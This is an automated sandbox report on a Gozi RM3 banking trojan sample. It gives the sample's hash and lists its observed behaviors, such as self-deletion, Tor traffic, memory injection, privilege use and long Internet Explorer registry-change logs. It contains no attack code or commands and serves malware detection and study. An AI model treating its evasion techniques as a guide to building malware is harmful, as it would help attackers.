Malware Analysis Report

2024-10-19 03:00

Sample ID 220315-h8lpzaghf8
Target Restr.com
SHA256 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
Tags
gozi_rm3 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Threat Level: Known bad

The file Restr.com was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Deletes itself

Uses Tor communications

Drops file in System32 directory

Program crash

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-15 07:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-15 07:24

Reported

2022-03-15 07:27

Platform

win7-20220311-en

Max time kernel

4294211s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000050d32a192cd422c1a45e0db59b1b6808990416a60b4941433f6bc01fb2d4b05f000000000e8000000002000020000000496b2f51d0346de1c57d095da14445476f7f1bd790229b87f4f1542e6b81e1de3001000070d3cfdfa313a50de02a935e58d90504e71ede2740772b60004b715e1dcc925b748c2278c9a4775769c0e7724ff88ef580753e62784ee08d573136875cda0f77ee0bc24a17f8abce016ee6d87e958389225033edda3d61bc2496b26a90ea19435839d52232b94d91743adb881365dc33c39096f32d9cc56ce394ea25807a5da9081a51f01af03829222e80705a7ebf45d59a53fe4e40e8224b80e39db3f7b453fbd224c97453cbd945c3cd3f1f04b6377c140688f6d8dc8657a9a11e284a0a8edb2705da1bf62bc56a69a93ad4b24cb9a35d264b475fb088b86cf250f57df03eaa5f6753729ae638a1e4f6f68fafa742d2f87cd7bed1d5cd21415ac41f80ee385a66377c3b0d9dc86e1d56f519fb7a35a6b958cb74a904556ad1bba0dd15069cb266bfe8d46a4ff805892accc28b3029400000009ccef3df8b8d97b7cf6afd54639fe06db28ead7c0f5c1d1557d5c9ab34a72e4143bef98f503b8a61716c33c3ec9dc9dafb3bf51e776362b01e583292bda3f3ae C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000e0424cdc6a0bd1780158b419987027644f9db33e9e8db730f124038195db7dc7000000000e8000000002000020000000372705df0a0d02ddcd73da2fdd80701c197e4f18e77c90878fb0e74701e4acfd300100001edcad16189f575ee4f189869ad4af76f46f5e8f42dbd72513c268d3325ea37ca196040581efca9fc8094d7e6951ae5939ee273d469921198d31e9377c9b13170b266835f88667784e34cf0921cc644779ebe38c87795099f4e6efb3fd850ee7ca14e9730bac0f2ecfcaf3cc398526de783af1061acde7ade77deef629e86830dfc34caff176f45b3e3e3dccd09003fc1aad7fc606a6745e7e5091d5b172bd1d6f9f818c1db43583e3f9a0880e1e6df459fc4ef140474edc190f3383f13ba649b3ecbf5a4514ac7216140c36d38811494000bfd8a1a7c8da816827ae115286ae9be5e4a20ceebd76cc68d0e8ee54c2cc67e4ae3f9ae372c81c00b2755be000941557cb970287b3ae83b3820c5df8ba77dfc8e9214d2d98cbefb237d8b020284bbdbd8c51434938635f24930680e1e95e40000000049fa51c708d612fc87806fa048a5f4a1b6cb5b606bc4ef19401f78dd3bb626d57c2ece30719fed450614e519a38a02838147094673f460bdef476ddded9a91b C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000ad98b0c8dbd0041c7a2b6633ee8f1584621464e0706430eab47b693f1df78fc9000000000e8000000002000020000000555543fe1f558e639c1f12be13ac4e4186f9a7c5d847b8a584f47ff3aaa7f8b9300100007ed8efba7868c3ac70ca3df9b27d3f4f1f150cf90fa422b083e824beff117cfc6c329115c7f8ad535a505cc3385f0d8d483b944e6a1255ea7472cd466cf26177101c7823d5f0916823f2961cbbfe25111cedf2b8e3a791c9aaec10805a4819857edbb29be1ad1d46139d897891020e9c525c836550808db88fb5a10bef458ef3c2d037a1f60e261358a4c3360eb53fec1695ff794a60f4cd153dd00aa7943533c143b2fdfca04e3e35854918ca95f80e4f5db8a49d1b74a714cffe2d5ec249c051fe907b44a8c231aa7e1241a206a622583c5acb1afb0e923597cfd22b1e325935eda0769860996116f0f20b09d500da036ebb50b8c7c480f6b3dbdbdf818a6062dffbdbc0ddaf13138b0e1c7671653192b4f36e3b565ab1e92e81c065a66db6eae18eb26d84c7a6fd7082d12d967b4e40000000d8b3c2d04420d1d0415df79a28d6754137a86b407820af67b3d7c2b8660a0337ca334e5aef0f85bd699cb7c4781ea64550edc5ab1adce40ebbaefb2388b67359 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000051ac8743cf487117fe14a79028e2ce35385be2ed8fc034d94a258f233e751609000000000e8000000002000020000000623baf82939646b332065e0960d984c9b0043b7f8168fb91926ab13aa76a4fe8200000000b3c09e8e708ffa202ac693a2c6a64b22fe0dde332c468d63494070e05932178400000006f80b8ce6d7166b1b70ac848ecb3fbb0f2443199de1d37da138d7c8103976e9dc530d7aed1f0f826d5d22b04f5fcd8af48e600cc750c4a2c113bf97e611a8f7c C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000f8af14d7020e27c2a21e9c1326469677ab222bad83e4c26670c388a978fd1aa2000000000e800000000200002000000059af66002c70c39d59bb5040bd5173b0efd402a19ca467486d992cac345ffccc9000000084fecdd82f65a1bac8bd8c1f3f5e68d77b3a4f865e6551dd76b1ad2533982b414bfeb528990390185447636c0f3fc5fdfa6c720292036e0579adcbeb15c205bd34c8be67fb213209307bd57b92c71be6273f61f22ade531ac31bb2699eaa3d227ba1bcbe4c15d4213e9d13c1cec9785e59a833cf62e7b9b1a51874d9271b5ff6edb807f1be55a289dd95037ae2b8532e40000000f64efbda8390ddc8db08b8523d14cbd3ff736aae620e330b19b4b2245988fbe356f12e3dc7d6039635e5ff100bbe5863e1d70828f34fca5ddee80103cf098363 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 707487c13d38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FA820831-A430-11EC-9919-DECC31BAF6C7} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000b31ff2c9a1e85fd2683390c349a08960896761cf78907ccecf106968f9a8a14f000000000e80000000020000200000002630aa0d8928f35aa9e81e38a2e66927402036c18bc34d26c1c6f77e7074802d300100001871e5eb5f9cb3b3acd49e3d99943fb6f8f270c6d54e46098a9f63f7572064ca7a693e0f2ef7cdf0ffb8fcf0d904ac876fb702b90b426b0ac822fe66c15944a2a2c1c2a4de173abd0d525ff58f09710c87a485180e917186ac8948b824ff0e5933eac7887651a6c04d28f0d50319f3419d6a0c33b99b33ef3fff710f476f647bbe6557209dc429d6bd6bd48e938b4c92c4553edda8d362618c8347cd6199b00248ea63275b367aa14123651adce92c401141f266ae7060bbc3d9f55de661ddea326bba5f30737ff11571850e6643d791aa89cffb620ea5844b08a3655546abf37da44befae495f31b9f96abbff3a54b9725417f225a46451bf7fabe9626f605e23c0c5161903ece8a1757128a28786b0a972b90b40722f8502e9b0262827a35987d51b0798075cc0430ed2717a15492a40000000e74eb0b91d1d35520d1a72db2f6c70a164d92df07b039f2e30e2183995ce9c154cc02adafbbc732983081f56ead5947f317944da539321c15f04404c6b7b6814 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000095b32bf5519cb97c80c86c80f2a0ecfaa43d834b533ded2ee2faace1d7e50f5a000000000e8000000002000020000000513bd7d33bf22d83d0e1051874a4d7007be5308ec48ee0c7ba7d0b9e644acf7a30010000a376dc94bdcb4fd2a90360166f412a4e7bebb664aac8178687831c2b48b1e9b3aec574b17da11c7a4d75d8e4dd274984b4569f8c33eed24cfbb4d2a1f44dabf86f73002a3bc979e52cea9a3af39e881c82263c9edec318bb61b1f40e4e551caef174867a4f79178ef5acf9f831691c10e07231b5d2f26de84e0ed089a9c8560f64361493b1398d00feebaa4a57d3160d66ff6170d0f3f8c4d78f3c976956a79e68f546713159d3c1e81a89448aa7f6ab2c841e14de7862eda14c44048ca00ef37dc9245cd7b1d396b6e4de04d02bc6c9268e74d87a4bcc04889e4471458d65bf1867d848a4e7882966c3f98fe79a210f3ec0536e36a205e7678cca2b2956126bde6f81d077a98b599a46e60ed991fcd08876023dbff4bfd70fc9c14276ddab34c0319d9cd8420d88360c35f7fddda7474000000051f6acdde4509539c3457c618ecdf500588cc077b601feb729e966ed6399d33db7f7c80935c8dbeae37a7128e58c88f4f151536df3541eca2d200c30892040fa C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000002f2d9ed9b2f1567478b44ebd76eeb171015d8e7784b9c97216ac9cb9e392ad07000000000e80000000020000200000003d65076e99456db375e625c87f47d8a69fe4535b1ba46557516ce73cbb5f707930010000627d70ab23ebb612c61a0087c458e492e594f8fc9f53ad7e2635032b93481573031ddee0eb4745953a93bdd7b65f263a904006b29550a248300f9b70839ce1cbfefa84e164d65a0aa916dee4fe43b2a1346449ae94a4eb3470edfabc6f09fbe4f78eb1d344c9f4e32c36ea0a38aac4c0b653cc8ca4378a4f31b760b263b9b9de5b24e8f7f368d32a39945e78e779e27e699eda7a184b692f49cb88679fee99def3e5639f35c72b4ce1611a7521212209ccf8007c432e9d2574896b291a41d4891d75810114f0c1c1c64605d19e8098b564e4765a01dca9d83082511b1733190476c7a3ae70f8e04b97ee860b9d17bd8ee81504288ec133a1c457f93411d9c16a7fabbffef6391cc17b4ee6c540c057981c6b29be927c6d5072e3ff7f1115be56bcd724461223b2dd9378829f0ac23bce40000000ff66debbb0c1035197c815b68c4ee7e9dcd0ff65a7caf09b33d10c6fa5818bc95183259137474a049c67516ed39c07795546225d48178b0da9bfa2f4ec56a817 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000d021195672043264c8de0c4eaba5c6870d8701d231578338cc84c43700d59315000000000e80000000020000200000008fbf60f1e082f0630635d8910aaadf534fce207169b9b8d2374d7f1dabe05fcf300100009c2696e2bcb5660fa716864cdd67b04e86edf3e3059981dacbdc210b08719eb68ad38904cdceb10151d13daed1dcd2ec6e7c650e62809b7c18bffa931d2b7439f79624b7dd2c8796fa8ba577bec5f866bc068972c5de761b327f1e26effb052f90c6d9973cdb30606c2d2b275eae7bec31dac391e8c1e5e99439ffaf1aea15be79ecbd83344b484c872f6e4edb7ca0c2e2a7aaac7defd5dff0b312b177ebe8c4c0a0b5162ceaa1ecaa39cadef489be8cc41333e9ddeb558cef74ae4bf30c4501599f7bb9bb52cabbbfee22e630c90d1eef53328a565ab994b6c683f4c7f28e8d6e12a353cb0354bc698fbfed6618c6522885ffef88a29de0156431c88e4e9b1d93fc38336df56959fc92973ef3d62e8390ef7450ca9c96ca8d77c5b6cfb1e1b0e5917889896f41c8802a787aae2c9a174000000072d7403a68c9891261b4991dbd4bd02f88b90eccaa45fd644db6405ec00607db03ad7f45d98141240b137fc5863cb525c1ce724355cf37168a15203d97e07a87 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000e02b9c2abba78d46fcd431661a47d74e3cdc31812f5185de1d68eead020be7a8000000000e80000000020000200000004f6d5d443b7759ce2dd19730d5233032e72585c82406155a8e454a5eea2c3b18300100007c34e20c3c0a71143a6b67c32f868bfab2ecbf244179a9a09298a124fd7b1476fa62bfcc83d82a497c9a7c1d4c125f033f6d0a1d903e99e08bcc7bf27342fb192b4107c1733f1eb6b1ef1e7fa18a4947470ba98376cfb7527eb337e478a4702388fd6649d245f55d870f6f8bf4b5f23cf3d202538c34b6bb8b95cbcb8f73e1162137b10dc0ce9620edf32282deb6f972a51baade834ae1fbde2f6aba5de623cf254b83d18c0db205b4a7b8519f1307f91487c162133f26641853aaaedea0d3001052c6c41071dc92fa02f10fbb143ced61e6fafe731e7cd674c8cbe8de3c05cd076110ab7e93883495721b3e6aebbefe2ecf2a2da4ddcde734b521ec2c59d840ed69e66bb67aab98af5ab08267d74df4af5c5f32a05f9aa495c235de62de5f029f2ac12cab55102dbac8ef5aa839c3d840000000593b33f91c3505102b341d1c811d8ed963ffa906649c0cae3e1bf16f58e68ed0a23d47c21f625ce84cfd829a821dc3df3f71b628dab04afe688becef42c76d29 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000000c3110a6ed9dc935355f6b4f09fdbf5137845cc7200e4d739b03f920808b8180000000000e8000000002000020000000c80867ac8bd2bd5918b0d1bc290f5255d836ab4ef37c030011daaed4496750d930010000cb0dc6cc79667953fdff598812e4b8fe201c0ed683c85caa95814fdaf2adeb351c4fe705c09d86c07cc0b427f8d41b79e1f178105e2b2ba8d73b7c32008d51e8ec184d03fa9f8713fb98c47f5f26c13dc4571b15061600fe2051c0dce816e7951397729718ea9bf75d2d7b41ba2bbd07bc88da6982c2e285cc8e407085e12e9900c679dc884e977696bf197bfff3b03f3258585594a62b1d186c5f43fa22bbe556c3804d0ef38cdc3099a9f36b98065d3fbfc803c464c77fc9ef3d09e7fb34711ece489061abe9450cd2a0b3d7f98e7d65d54ce20437d6482d186fbb144dcc7d170b4f07f80cc01c91725231027654045d19ec6252568c1cc7195c392835af604260338ef0f1e3b4fcbd91100fb89da7138fa09be10e87664c5cb64aeb5597bc048dd6f5699adf41900a3e7adbd37fd64000000079847f686e916680f5677ee44cb5d4fccc90fcf49bcf3906d71d9dd4d9f4dbec52eaf90a938b780cf796e18242866ef1100e5e45f1829327312fe8831aec851d C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
